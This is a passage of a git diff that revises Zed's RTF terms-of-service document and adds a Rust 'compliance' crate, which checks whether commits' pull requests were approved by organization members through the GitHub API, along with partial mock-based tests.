RELATING TO THESE TERMS. CUSTOMER AND ZED EACH AGREE THAT ANY SUIT, PROCEEDING, OR OTHER ACTION ARISING OUT OF OR RELATED TO THESE TERMS WILL BE CONDUCTED ONLY ON AN INDIVIDUAL BASIS AND NOT IN A CLASS, CONSOLIDATED OR REPRESENTATIVE ACTION.\par} +{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel1 \b \fs32 16. General Terms\par} +{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel2 \b \fs28 16.1.\par} +{\pard \ql \f0 \sa180 \li0 \fi0 These Terms, including the Privacy Policy and any other agreements expressly incorporated by reference into these Terms, are the entire and exclusive understanding and agreement between Customer and Zed regarding your use of the Service. Customer\u160 ?may not assign or transfer these Terms or its rights under these Terms, in whole or in part, by operation of law or otherwise, without Zed\u8217's prior written consent. Zed may assign these Terms and all rights granted under these Terms at any time without notice or consent. The failure to require performance of any provision will not affect Zed\u8217's right to require performance at any other time after that, nor will a waiver by Zed of any breach or default of these Terms, or any provision of these Terms, be a waiver of any subsequent breach or default or a waiver of the provision itself. Use of Section\u160 ?headers in these Terms are for convenience only and will not have any impact on the interpretation of any provision. Throughout these Terms the use of the word \u8220"including\u8221" means \u8220"including but not limited to.\u8221" If any part of these Terms are held to be invalid or unenforceable, then the unenforceable part will be given effect to the greatest extent possible, and the remaining parts will remain in full force and effect.\par} +{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel2 \b \fs28 16.2. Notices\par} +{\pard \ql \f0 \sa180 \li0 \fi0 Except as set out in the Terms, any notice or consent under the Terms must be in writing to the Customer email address on the Order and Customer shall send all notices to Zed at Zed Industries, Inc., 2590 Welton Street, Suite 200, PMB 1916, Denver, CO 80205 with cc: to {\field{\*\fldinst{HYPERLINK "mailto:legal@zed.dev"}}{\fldrslt{\ul +legal@zed.dev +}}} +\u160 ?and will be deemed given: (a) upon receipt if by personal delivery; (b) upon receipt if by certified or registered U.S. mail (return receipt requested); or (c) one day after dispatch if by a commercial overnight delivery service. Either Party may update its address with notice to the other Party pursuant to this Section. Zed may also send operational notices to Customer\u160 ?by email or through the Service.\par} +{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel2 \b \fs28 16.3. DPA\par} +{\pard \ql \f0 \sa180 \li0 \fi0 The terms of the Data Processing Agreement (\u8220"{\b DPA}\u8221"), available upon request, are incorporated into these Terms by reference.\par} +{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel2 \b \fs28 16.4. Modification of Terms\par} +{\pard \ql \f0 \sa180 \li0 \fi0 Zed may, from time to time, change these Terms. Please check these Terms periodically for changes. Revisions will be effective immediately except that, for existing users, material revisions will be effective 30 days after posting or notice to Customer of the revisions unless otherwise stated. Zed may require that Customer\u160 ?accept modified Terms in order to continue to use the Service. If Customer does not agree to the modified Terms, then Customer should discontinue its use of the Service and notify Zed at hi@zed.dev, in which case Zed will provide a pro-rated refund of any prepaid Subscription Fee. The terms in any Customer purchase order or business form will not amend or modify the Terms and are expressly rejected by Zed; any of these Customer documents are for administrative purposes only and have no legal effect with respect to the Terms.\par} +{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel2 \b \fs28 16.5. Subcontractors\par} +{\pard \ql \f0 \sa180 \li0 \fi0 Zed may use subcontractors and permit them to exercise Zed\u8217's rights, but Zed remains responsible for their compliance with the Terms and for its overall performance under the Terms.\par} +{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel2 \b \fs28 16.6. Independent Contractors\par} +{\pard \ql \f0 \sa180 \li0 \fi0 The Parties are independent contractors, not agents, partners, or joint venturers.\par} +{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel2 \b \fs28 16.7. Export\par} +{\pard \ql \f0 \sa180 \li0 \fi0 Customer\u160 ?will comply with all relevant U.S. and foreign export and import Laws in using the Service. Customer: (a) represents and warrants that it is not listed on any U.S. government list of prohibited or restricted parties or located in (or a national of) a country that is subject to a U.S. government embargo or that has been designated by the U.S. government as a \u8220"terrorist supporting\u8221" country; (b) agrees not to access or use the Service in violation of any U.S. export embargo, prohibition, or restriction; and (c) will not submit to the Service any information controlled under the U.S. International Traffic in Arms Regulations.\par} +{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel2 \b \fs28 16.8. Government End-Users\par} +{\pard \ql \f0 \sa180 \li0 \fi0 Elements of the Service may include commercial computer software. If the user or licensee of the Service is an agency, department, or other entity of the United States Government, the use, duplication, reproduction, release, modification, disclosure, or transfer of the Service or any related documentation of any kind, including technical data and manuals, is restricted by the terms of the Terms in accordance with Federal Acquisition Regulation 12.212 for civilian purposes and Defense Federal Acquisition Regulation Supplement 227.7202 for military purposes. The Service was developed fully at private expense. All other use is prohibited.\par} +{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel2 \b \fs28 16.9. Privacy Policy\par} +{\pard \ql \f0 \sa180 \li0 \fi0 Please read the {\field{\*\fldinst{HYPERLINK "/privacy-policy"}}{\fldrslt{\ul +Zed Privacy Policy +}}} + (the \u8220"{\b Privacy Policy}\u8221") carefully for information relating to our collection, use, storage, and disclosure of your personal information. The Zed Privacy Policy is incorporated by this reference into, and made a part of, these Terms.\par} +{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel2 \b \fs28 16.10. Additional Terms\par} +{\pard \ql \f0 \sa180 \li0 \fi0 Customer\u8217's use of the Service is subject to all additional terms, policies, rules, or guidelines applicable to the Service or certain features of the Service that we may post on or link to from the Service (the \u8220"{\b Additional Terms}\u8221"). All Additional Terms are incorporated by this reference into, and made a part of, these Terms.\par} +{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel2 \b \fs28 16.11. Consent to Electronic Communications\par} +{\pard \ql \f0 \sa180 \li0 \fi0 By using the Service, Customer consents to receiving certain electronic communications from Zed as further described in the Privacy Policy. Please read the Privacy Policy to learn more about Zed\u8217's electronic communications practices. Customer agrees that any notices, agreements, disclosures, or other communications that Zed sends to Customer electronically will satisfy any legal communication requirements, including that those communications be in writing. Zed may send Customer emails concerning Zed products and services, as well as those of third parties. Customer\u160 ?may opt out of promotional emails by following the unsubscribe instructions in the promotional email itself.\par} +{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel2 \b \fs28 16.12. Contact Information\par} +{\pard \ql \f0 \sa180 \li0 \fi0 The Service is offered by Zed Industries, Inc. Customer\u160 ?may contact Zed by sending correspondence to 2590 Welton Street, Suite 200, PMB 1916, Denver, CO 80205 with cc: to {\field{\*\fldinst{HYPERLINK "mailto:legal@zed.dev"}}{\fldrslt{\ul +legal@zed.dev }}} .\par} -{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel1 \b \fs32 4. FEE BASED SERVICES, FEES AND PAYMENT TERMS\par} -{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel2 \b \fs28 4.1. Fee Based Services\par} -{\pard \ql \f0 \sa180 \li0 \fi0 The Zed AI Services is made available with additional usage benefits (the \u8220"Enhanced Use \u8221") as described in the table published at {\field{\*\fldinst{HYPERLINK "https://zed.dev/pricing"}}{\fldrslt{\ul -zed.dev/pricing -}}} - (the \u8220"Pricing Table\u8221"), subject to the requirements and limitations set forth in the Pricing Table and these Terms. In order to make use of the Enhanced Use, Customer must access the Zed AI Services through a Zed registered account.\par} -{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel2 \b \fs28 4.2. Fees\par} -{\pard \ql \f0 \sa180 \li0 \fi0 Customer shall pay to Zed the applicable fees set forth in Pricing Table, together with any applicable taxes and shipping and handling (collectively, the \u8220"Fees\u8221"). Customer shall have no right of return, and all Fees shall be non-refundable.\par} -{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel2 \b \fs28 4.3. Payment Terms\par} -{\pard \ql \f0 \sa180 \li0 \fi0 All amounts payable to Zed under this Agreement shall be paid in United States dollars and paid Zed according to the method of payment, frequency and calculated as set forth in the Pricing Table.\par} -{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel2 \b \fs28 4.4. Taxes; Set-offs\par} -{\pard \ql \f0 \sa180 \li0 \fi0 Any and all payments made by Customer in accordance with this Agreement are exclusive of any taxes that might be assessed by any jurisdiction. Customer shall pay or reimburse Zed for all sales, use, property and similar taxes; all customs duties, import fees, stamp duties, license fees and similar charges; and all other mandatory payments to government agencies of whatever kind, except taxes imposed on the net or gross income of Zed. All amounts payable to Zed under this Agreement shall be without set-off and without deduction of any taxes, levies, imposts, charges, withholdings and/or duties of any nature which may be levied or imposed, including without limitation, value added tax, customs duty and withholding tax.\par} -{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel1 \b \fs32 5. TERM AND TERMINATION\par} -{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel2 \b \fs28 5.1. Term\par} -{\pard \ql \f0 \sa180 \li0 \fi0 The term of this Agreement shall commence on the date You first download the Editor or use the Zed Service (the "Effective Date"), and unless terminated earlier according to this Section 3, will end pursuant to this Section 5 (the "Term").\par} -{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel2 \b \fs28 5.2. Termination\par} -{\pard \ql \f0 \sa180 \li0 \fi0 This Agreement may be terminated: (a) by either party if the other has materially breached this Agreement; or (b) by Zed at any time and for any reason upon notice to Customer. You acknowledge that Zed is under no obligation to continue to operate the Zed Service or make the Editor available, and We may end any programs in connection with the same at any time.\par} -{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel2 \b \fs28 5.3. Effect of Termination and Survival\par} -{\pard \ql \f0 \sa180 \li0 \fi0 Upon any expiration or termination of this Agreement, Customer shall (i) immediately cease use of the Zed Service, and (ii) return all Zed Confidential Information and other materials provided by Zed. The following provisions will survive termination of this Agreement: Sections 3.3 (Customer Data), Section 3.4 (Privacy Policy), Section 5.3 (Effect of Termination and Survival), Section 6 (Ownership), Section 7 (Indemnification), Section 9 (Limitation of Liability), Section 10 (Third Party Services), and Section 11 (Miscellaneous).\par} -{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel1 \b \fs32 6. OWNERSHIP\par} -{\pard \ql \f0 \sa180 \li0 \fi0 Zed retains all right, title, and interest in and to the Zed Service, Editor, and any software, products, works or other intellectual property created, used, provided, or made available by Zed under or in connection with the Zed Service or Editor. Customer may from time to time provide suggestions, comments, or other feedback to Zed with respect to the Zed Service or Editor ("Feedback"). Customer shall, and hereby does, grant to Zed a nonexclusive, worldwide, perpetual, irrevocable, transferable, sublicensable, royalty-free, fully paid-up license to use and exploit the Feedback for any purpose. You retain all right, title and interest in and to the Customer Data, including all intellectual property rights therein. No intellectual property rights with respect to any software code you develop or modify with the Editor or Zed Service (collectively, the \u8220"Output\u8221") are transferred or assigned to Zed hereunder.\par} -{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel1 \b \fs32 7. INDEMNIFICATION\par} -{\pard \ql \f0 \sa180 \li0 \fi0 Customer will defend, indemnify, and hold Zed, its affiliates, suppliers and licensors harmless and each of their respective officers, directors, employees and representatives from and against any claims, damages, losses, liabilities, costs, and expenses (including reasonable attorneys' fees) arising out of or relating to any third party claim with respect to: (a) Customer Data; (b) breach of this Agreement or violation of applicable law by Customer; or (c) alleged infringement or misappropriation of third-party's intellectual property rights resulting from Customer Data.\par} -{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel1 \b \fs32 8. WARRANTY\par} -{\pard \ql \f0 \sa180 \li0 \fi0 Zed does not represent or warrant that the operation of the Zed Service or Editor (or any portion thereof) will be uninterrupted or error free, or that the Zed Service or Editor (or any portion thereof) will operate in combination with other hardware, software, systems or data not provided by Zed. CUSTOMER ACKNOWLEDGES THAT, ZED MAKES NO EXPRESS OR IMPLIED REPRESENTATIONS OR WARRANTIES OF ANY KIND WITH RESPECT TO THE SERVICE OR SOFTWARE, OR THEIR CONDITION. ZED HEREBY EXPRESSLY EXCLUDES, ANY AND ALL OTHER EXPRESS OR IMPLIED REPRESENTATIONS OR WARRANTIES, WHETHER UNDER COMMON LAW, STATUTE OR OTHERWISE, INCLUDING WITHOUT LIMITATION ANY AND ALL WARRANTIES AS TO MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE, SATISFACTORY QUALITY OR NON-INFRINGEMENT OF THIRD-PARTY RIGHTS.\par} -{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel1 \b \fs32 9. LIMITATIONS OF LIABILITY\par} -{\pard \ql \f0 \sa180 \li0 \fi0 IN NO EVENT SHALL ZED BE LIABLE FOR ANY LOST DATA, LOST PROFITS, BUSINESS INTERRUPTION, REPLACEMENT SERVICE OR OTHER SPECIAL, INCIDENTAL, CONSEQUENTIAL, PUNITIVE OR INDIRECT DAMAGES, HOWEVER CAUSED AND REGARDLESS OF THEORY OF LIABILITY. ZED'S LIABILITY FOR ALL CLAIMS ARISING UNDER THIS AGREEMENT, WHETHER IN CONTRACT, TORT OR OTHERWISE, SHALL NOT EXCEED THE GREATER OF: THE FEES PAID TO ZED BY CUSTOMER DURING THE TWELVE (12) MONTH PERIOD PRECEDING THE DATE OF THE CLAIM, OR ONE THOUSAND US DOLLARS ($1,000).\par} -{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel1 \b \fs32 10. Third Party Services\par} -{\pard \ql \f0 \sa180 \li0 \fi0 Zed may make certain third party services available to You within the Editor or the Zed Service (each a "Third Party Service"). You acknowledge and agree that (a) use of each Third Party Service is subject to the corresponding terms and conditions available at the following URL: {\field{\*\fldinst{HYPERLINK "https://zed.dev/third-party-terms"}}{\fldrslt{\ul -https://zed.dev/third-party-terms -}}} - and/or presented in connection with Your use of such Third Party Service; (b) the terms and conditions of this Agreement do not apply with respect to Your use of any Third Party Service; and (c) Zed is not liable in any way regarding Your use of any Third Party Service.\par} -{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel1 \b \fs32 11. MISCELLANEOUS\par} -{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel2 \b \fs28 11.1. Export Control\par} -{\pard \ql \f0 \sa180 \li0 \fi0 You hereby certify that You will comply with all current US Export Control laws. You agree to defend, indemnify and hold Zed harmless from any liability for Your violation of U.S. Export Control laws.\par} -{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel2 \b \fs28 11.2. Compliance with Laws\par} -{\pard \ql \f0 \sa180 \li0 \fi0 You shall comply with all applicable laws and regulations in its use of the Solution, including without limitation the unlawful gathering or collecting, or assisting in the gathering or collecting of information in violation of any privacy laws or regulations. You shall, at its own expense, defend, indemnify and hold harmless Zed from and against any and all claims, losses, liabilities, damages, judgments, government or federal sanctions, costs and expenses (including attorneys' fees) incurred by Zed arising from any claim or assertion by any third party of violation of privacy laws or regulations by You or any of its agents, officers, directors or employees.\par} -{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel2 \b \fs28 11.3. Assignment\par} -{\pard \ql \f0 \sa180 \li0 \fi0 Neither party may transfer and assign its rights and obligations under this Agreement without the prior written consent of the other party. Notwithstanding the foregoing, Zed may transfer and assign its rights under this Agreement without consent from the other party in connection with a change in control, acquisition or sale of all or substantially all of its assets.\par} -{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel2 \b \fs28 11.4. Force Majeure\par} -{\pard \ql \f0 \sa180 \li0 \fi0 Neither party shall be responsible for failure or delay in performance by events out of their reasonable control, including but not limited to, acts of God, Internet outage, terrorism, war, fires, earthquakes and other disasters (each a "Force Majeure"). Notwithstanding the foregoing: if a Force Majeure continues for more than thirty (30) days, either party may to terminate this agreement by written notice to the other party.\par} -{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel2 \b \fs28 11.5. Notice\par} -{\pard \ql \f0 \sa180 \li0 \fi0 All notices between the parties shall be in writing and shall be deemed to have been given if personally delivered or sent by registered or certified mail (return receipt), or by recognized courier service.\par} -{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel2 \b \fs28 11.6. No Agency\par} -{\pard \ql \f0 \sa180 \li0 \fi0 Both parties agree that no agency, partnership, joint venture, or employment is created as a result of this Agreement. You do not have any authority of any kind to bind Zed.\par} -{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel2 \b \fs28 11.7. Governing Law\par} -{\pard \ql \f0 \sa180 \li0 \fi0 This Agreement shall be governed exclusively by, and construed exclusively in accordance with, the laws of the United States and the State of California, without regard to its conflict of laws provisions. The federal courts of the United States in the Northern District of California and the state courts of the State of California shall have exclusive jurisdiction to adjudicate any dispute arising out of or relating to this Agreement. Each party hereby consents to the jurisdiction of such courts and waives any right it may otherwise have to challenge the appropriateness of such forums, whether on the basis of the doctrine of forum non conveniens or otherwise. The United Nations Convention on Contracts for the International Sale of Goods shall not apply to this Agreement or any Purchase Order issued under this Agreement.\par} -{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel2 \b \fs28 11.8. Updated Agreement\par} -{\pard \ql \f0 \sa180 \li0 \fi0 Zed reserves the right to update this Agreement at any time. The terms and conditions of the updated version of the Agreement shall apply to the Zed Service and Editor downloaded, or accessed following the date of publication of the updated version. If You do not agree with any terms of the updated Agreement, You may not use or access the Zed Service or Editor in any manner. Zed may from time-to-time provide release notes applicable to the Editor or Zed Service, and such release notes may contain additional use restrictions or terms applicable to Customer Data. Your use of the Editor or Zed Service after the applicable release notes are made available shall be subject to the additional use restrictions or terms applicable to Customer Data.\par} -{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel2 \b \fs28 11.9. Entire Agreement\par} -{\pard \ql \f0 \sa180 \li0 \fi0 This Agreement is the complete and exclusive statement of the mutual understanding of the parties and supersedes and cancels all previous written and oral agreements, communications, and other understandings relating to the subject matter of this Agreement, and all waivers and modifications must be in a writing signed by both parties, except as otherwise provided herein. Any term or provision of this Agreement held to be illegal or unenforceable shall be, to the fullest extent possible, interpreted so as to be construed as valid, but in any event the validity or enforceability of the remainder hereof shall not be affected.\par} -{\pard \ql \f0 \sa180 \li0 \fi0 {\b DATE: May 6, 2025}\par} +{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel2 \b \fs28 16.13. Notice to California Residents\par} +{\pard \ql \f0 \sa180 \li0 \fi0 If Customer is a California resident, then under California Civil Code Section\u160 ?1789.3, Customer may contact the Complaint Assistance Unit of the Division of Consumer Services of the California Department of Consumer Affairs in writing at 1625 N. Market Blvd., Suite N 112, Sacramento, California 95834, or by telephone at +1-800-952-5210 in order to resolve a complaint regarding the Service or to receive further information regarding use of the Service.\par} } diff --git a/tooling/compliance/Cargo.toml b/tooling/compliance/Cargo.toml new file mode 100644 index 0000000000000000000000000000000000000000..9b1ade359daa4b7a02beff861c94e01fff071f84 --- /dev/null +++ b/tooling/compliance/Cargo.toml @@ -0,0 +1,38 @@ +[package] +name = "compliance" +version = "0.1.0" +edition.workspace = true +publish.workspace = true +license = "GPL-3.0-or-later" + +[lints] +workspace = true + +[features] +octo-client = ["dep:octocrab", "dep:jsonwebtoken", "dep:futures", "dep:tokio"] + +[dependencies] +anyhow.workspace = true +async-trait.workspace = true +derive_more.workspace = true +futures = { workspace = true, optional = true } +itertools.workspace = true +jsonwebtoken = { version = "10.2", features = ["use_pem"], optional = true } +octocrab = { version = "0.49", default-features = false, features = [ + "default-client", + "jwt-aws-lc-rs", + "retry", + "rustls", + "rustls-aws-lc-rs", + "stream", + "timeout" +], optional = true } +regex.workspace = true +semver.workspace = true +serde.workspace = true +serde_json.workspace = true +tokio = { workspace = true, optional = true } + +[dev-dependencies] +indoc.workspace = true +tokio = { workspace = true, features = ["rt", "macros"] } diff --git a/tooling/compliance/LICENSE-GPL b/tooling/compliance/LICENSE-GPL new file mode 120000 index 0000000000000000000000000000000000000000..89e542f750cd3860a0598eff0dc34b56d7336dc4 --- /dev/null +++ b/tooling/compliance/LICENSE-GPL @@ -0,0 +1 @@ +../../LICENSE-GPL \ No newline at end of file diff --git a/tooling/compliance/src/checks.rs b/tooling/compliance/src/checks.rs new file mode 100644 index 0000000000000000000000000000000000000000..a0623fbbbc179edf9f5b6d777b3116ff498f0265 --- /dev/null +++ b/tooling/compliance/src/checks.rs @@ -0,0 +1,647 @@ +use std::{fmt, ops::Not as _}; + +use itertools::Itertools as _; + +use crate::{ + git::{CommitDetails, CommitList}, + github::{ + CommitAuthor, GitHubClient, GitHubUser, GithubLogin, PullRequestComment, PullRequestData, + PullRequestReview, ReviewState, + }, + report::Report, +}; + +const ZED_ZIPPY_COMMENT_APPROVAL_PATTERN: &str = "@zed-zippy approve"; +const ZED_ZIPPY_GROUP_APPROVAL: &str = "@zed-industries/approved"; + +#[derive(Debug)] +pub enum ReviewSuccess { + ApprovingComment(Vec), + CoAuthored(Vec), + ExternalMergedContribution { merged_by: GitHubUser }, + PullRequestReviewed(Vec), +} + +impl ReviewSuccess { + pub(crate) fn reviewers(&self) -> anyhow::Result { + let reviewers = match self { + Self::CoAuthored(authors) => authors.iter().map(ToString::to_string).collect_vec(), + Self::PullRequestReviewed(reviews) => reviews + .iter() + .filter_map(|review| review.user.as_ref()) + .map(|user| format!("@{}", user.login)) + .collect_vec(), + Self::ApprovingComment(comments) => comments + .iter() + .map(|comment| format!("@{}", comment.user.login)) + .collect_vec(), + Self::ExternalMergedContribution { merged_by } => { + vec![format!("@{}", merged_by.login)] + } + }; + + let reviewers = reviewers.into_iter().unique().collect_vec(); + + reviewers + .is_empty() + .not() + .then(|| reviewers.join(", ")) + .ok_or_else(|| anyhow::anyhow!("Expected at least one reviewer")) + } +} + +impl fmt::Display for ReviewSuccess { + fn fmt(&self, formatter: &mut fmt::Formatter<'_>) -> fmt::Result { + match self { + Self::CoAuthored(_) => formatter.write_str("Co-authored by an organization member"), + Self::PullRequestReviewed(_) => { + formatter.write_str("Approved by an organization review") + } + Self::ApprovingComment(_) => { + formatter.write_str("Approved by an organization approval comment") + } + Self::ExternalMergedContribution { .. } => { + formatter.write_str("External merged contribution") + } + } + } +} + +#[derive(Debug)] +pub enum ReviewFailure { + // todo: We could still query the GitHub API here to search for one + NoPullRequestFound, + Unreviewed, + UnableToDetermineReviewer, + Other(anyhow::Error), +} + +impl fmt::Display for ReviewFailure { + fn fmt(&self, formatter: &mut fmt::Formatter<'_>) -> fmt::Result { + match self { + Self::NoPullRequestFound => formatter.write_str("No pull request found"), + Self::Unreviewed => formatter + .write_str("No qualifying organization approval found for the pull request"), + Self::UnableToDetermineReviewer => formatter.write_str("Could not determine reviewer"), + Self::Other(error) => write!(formatter, "Failed to inspect review state: {error}"), + } + } +} + +pub(crate) type ReviewResult = Result; + +impl> From for ReviewFailure { + fn from(err: E) -> Self { + Self::Other(anyhow::anyhow!(err)) + } +} + +pub struct Reporter<'a> { + commits: CommitList, + github_client: &'a GitHubClient, +} + +impl<'a> Reporter<'a> { + pub fn new(commits: CommitList, github_client: &'a GitHubClient) -> Self { + Self { + commits, + github_client, + } + } + + /// Method that checks every commit for compliance + async fn check_commit(&self, commit: &CommitDetails) -> Result { + let Some(pr_number) = commit.pr_number() else { + return Err(ReviewFailure::NoPullRequestFound); + }; + + let pull_request = self.github_client.get_pull_request(pr_number).await?; + + if let Some(approval) = self.check_pull_request_approved(&pull_request).await? { + return Ok(approval); + } + + if let Some(approval) = self + .check_approving_pull_request_comment(&pull_request) + .await? + { + return Ok(approval); + } + + if let Some(approval) = self.check_commit_co_authors(commit).await? { + return Ok(approval); + } + + // if let Some(approval) = self.check_external_merged_pr(pr_number).await? { + // return Ok(approval); + // } + + Err(ReviewFailure::Unreviewed) + } + + async fn check_commit_co_authors( + &self, + commit: &CommitDetails, + ) -> Result, ReviewFailure> { + if commit.co_authors().is_some() + && let Some(commit_authors) = self + .github_client + .get_commit_authors([commit.sha()]) + .await? + .get(commit.sha()) + .and_then(|authors| authors.co_authors()) + { + let mut org_co_authors = Vec::new(); + for co_author in commit_authors { + if let Some(github_login) = co_author.user() + && self + .github_client + .check_org_membership(github_login) + .await? + { + org_co_authors.push(co_author.clone()); + } + } + + Ok(org_co_authors + .is_empty() + .not() + .then_some(ReviewSuccess::CoAuthored(org_co_authors))) + } else { + Ok(None) + } + } + + #[allow(unused)] + async fn check_external_merged_pr( + &self, + pull_request: PullRequestData, + ) -> Result, ReviewFailure> { + if let Some(user) = pull_request.user + && self + .github_client + .check_org_membership(&GithubLogin::new(user.login)) + .await? + .not() + { + pull_request.merged_by.map_or( + Err(ReviewFailure::UnableToDetermineReviewer), + |merged_by| { + Ok(Some(ReviewSuccess::ExternalMergedContribution { + merged_by, + })) + }, + ) + } else { + Ok(None) + } + } + + async fn check_pull_request_approved( + &self, + pull_request: &PullRequestData, + ) -> Result, ReviewFailure> { + let pr_reviews = self + .github_client + .get_pull_request_reviews(pull_request.number) + .await?; + + if !pr_reviews.is_empty() { + let mut org_approving_reviews = Vec::new(); + for review in pr_reviews { + if let Some(github_login) = review.user.as_ref() + && pull_request + .user + .as_ref() + .is_none_or(|pr_user| pr_user.login != github_login.login) + && review + .state + .is_some_and(|state| state == ReviewState::Approved) + && self + .github_client + .check_org_membership(&GithubLogin::new(github_login.login.clone())) + .await? + { + org_approving_reviews.push(review); + } + } + + Ok(org_approving_reviews + .is_empty() + .not() + .then_some(ReviewSuccess::PullRequestReviewed(org_approving_reviews))) + } else { + Ok(None) + } + } + + async fn check_approving_pull_request_comment( + &self, + pull_request: &PullRequestData, + ) -> Result, ReviewFailure> { + let other_comments = self + .github_client + .get_pull_request_comments(pull_request.number) + .await?; + + if !other_comments.is_empty() { + let mut org_approving_comments = Vec::new(); + + for comment in other_comments { + if pull_request + .user + .as_ref() + .is_some_and(|pr_author| pr_author.login != comment.user.login) + && comment.body.as_ref().is_some_and(|body| { + body.contains(ZED_ZIPPY_COMMENT_APPROVAL_PATTERN) + || body.contains(ZED_ZIPPY_GROUP_APPROVAL) + }) + && self + .github_client + .check_org_membership(&GithubLogin::new(comment.user.login.clone())) + .await? + { + org_approving_comments.push(comment); + } + } + + Ok(org_approving_comments + .is_empty() + .not() + .then_some(ReviewSuccess::ApprovingComment(org_approving_comments))) + } else { + Ok(None) + } + } + + pub async fn generate_report(mut self) -> anyhow::Result { + let mut report = Report::new(); + + let commits_to_check = std::mem::take(&mut self.commits); + let total_commits = commits_to_check.len(); + + for (i, commit) in commits_to_check.into_iter().enumerate() { + println!( + "Checking commit {:?} ({current}/{total})", + commit.sha().short(), + current = i + 1, + total = total_commits + ); + + let review_result = self.check_commit(&commit).await; + + if let Err(err) = &review_result { + println!("Commit {:?} failed review: {:?}", commit.sha().short(), err); + } + + report.add(commit, review_result); + } + + Ok(report) + } +} + +#[cfg(test)] +mod tests { + use std::rc::Rc; + use std::str::FromStr; + + use crate::git::{CommitDetails, CommitList, CommitSha}; + use crate::github::{ + AuthorsForCommits, GitHubApiClient, GitHubClient, GitHubUser, GithubLogin, + PullRequestComment, PullRequestData, PullRequestReview, ReviewState, + }; + + use super::{Reporter, ReviewFailure, ReviewSuccess}; + + struct MockGitHubApi { + pull_request: PullRequestData, + reviews: Vec, + comments: Vec, + commit_authors_json: serde_json::Value, + org_members: Vec, + } + + #[async_trait::async_trait(?Send)] + impl GitHubApiClient for MockGitHubApi { + async fn get_pull_request(&self, _pr_number: u64) -> anyhow::Result { + Ok(self.pull_request.clone()) + } + + async fn get_pull_request_reviews( + &self, + _pr_number: u64, + ) -> anyhow::Result> { + Ok(self.reviews.clone()) + } + + async fn get_pull_request_comments( + &self, + _pr_number: u64, + ) -> anyhow::Result> { + Ok(self.comments.clone()) + } + + async fn get_commit_authors( + &self, + _commit_shas: &[&CommitSha], + ) -> anyhow::Result { + serde_json::from_value(self.commit_authors_json.clone()).map_err(Into::into) + } + + async fn check_org_membership(&self, login: &GithubLogin) -> anyhow::Result { + Ok(self + .org_members + .iter() + .any(|member| member == login.as_str())) + } + + async fn ensure_pull_request_has_label( + &self, + _label: &str, + _pr_number: u64, + ) -> anyhow::Result<()> { + Ok(()) + } + } + + fn make_commit( + sha: &str, + author_name: &str, + author_email: &str, + title: &str, + body: &str, + ) -> CommitDetails { + let formatted = format!( + "{sha}|field-delimiter|{author_name}|field-delimiter|{author_email}|field-delimiter|\ + {title}|body-delimiter|{body}|commit-delimiter|" + ); + CommitList::from_str(&formatted) + .expect("test commit should parse") + .into_iter() + .next() + .expect("should have one commit") + } + + fn review(login: &str, state: ReviewState) -> PullRequestReview { + PullRequestReview { + user: Some(GitHubUser { + login: login.to_owned(), + }), + state: Some(state), + } + } + + fn comment(login: &str, body: &str) -> PullRequestComment { + PullRequestComment { + user: GitHubUser { + login: login.to_owned(), + }, + body: Some(body.to_owned()), + } + } + + struct TestScenario { + pull_request: PullRequestData, + reviews: Vec, + comments: Vec, + commit_authors_json: serde_json::Value, + org_members: Vec, + commit: CommitDetails, + } + + impl TestScenario { + fn single_commit() -> Self { + Self { + pull_request: PullRequestData { + number: 1234, + user: Some(GitHubUser { + login: "alice".to_owned(), + }), + merged_by: None, + }, + reviews: vec![], + comments: vec![], + commit_authors_json: serde_json::json!({}), + org_members: vec![], + commit: make_commit( + "abc12345abc12345", + "Alice", + "alice@test.com", + "Fix thing (#1234)", + "", + ), + } + } + + fn with_reviews(mut self, reviews: Vec) -> Self { + self.reviews = reviews; + self + } + + fn with_comments(mut self, comments: Vec) -> Self { + self.comments = comments; + self + } + + fn with_org_members(mut self, members: Vec<&str>) -> Self { + self.org_members = members.into_iter().map(str::to_owned).collect(); + self + } + + fn with_commit_authors_json(mut self, json: serde_json::Value) -> Self { + self.commit_authors_json = json; + self + } + + fn with_commit(mut self, commit: CommitDetails) -> Self { + self.commit = commit; + self + } + + async fn run_scenario(self) -> Result { + let mock = MockGitHubApi { + pull_request: self.pull_request, + reviews: self.reviews, + comments: self.comments, + commit_authors_json: self.commit_authors_json, + org_members: self.org_members, + }; + let client = GitHubClient::new(Rc::new(mock)); + let reporter = Reporter::new(CommitList::default(), &client); + 